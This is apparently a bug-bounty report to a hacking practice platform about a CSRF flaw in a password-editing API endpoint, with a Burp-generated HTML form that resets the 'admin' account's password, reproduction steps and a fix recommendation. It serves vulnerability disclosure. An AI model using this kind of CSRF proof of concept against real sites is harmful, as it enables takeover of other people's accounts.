Summary:

Hi!

I found out that the /drpanel/drapi/editpassword.php endpoint is also vulnerable to CSRF with a potential impact of a full account takeover.

Possible cause:

Developers may have forgotten to set CSRF protection and protect the API endpoint from being invoked without the user's knowledge.

Impact:

At the moment, it is already possible to edit anyones password (as I have proven in one of my previous submissions). However, even if an authorization check comes in place, it would still be possible to change someone else's password without their knowledge thanks to this CSRF vulnerability.

Steps to reproduce:

1) Copy the following PoC code and save it in a HTML file.

<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('', '', '/')</script><form action="https://fd081d6ea1d3-0xblackbird.a.firstbloodhackers.com/drpanel/drapi/editpassword.php" method="POST"><input type="hidden" name="username" value="admin" /><input type="submit" value="Submit request" /></form></body></html>

2) Open it in a browser and submit the form

3) The response should contain your newly generated password. This means that the user is unable to login using his/her own previous password.

Mitigation

I highly recommend to add proper CSRF measures against the API endpoint.

Have a nice day!

Kind regards, 0xblackbird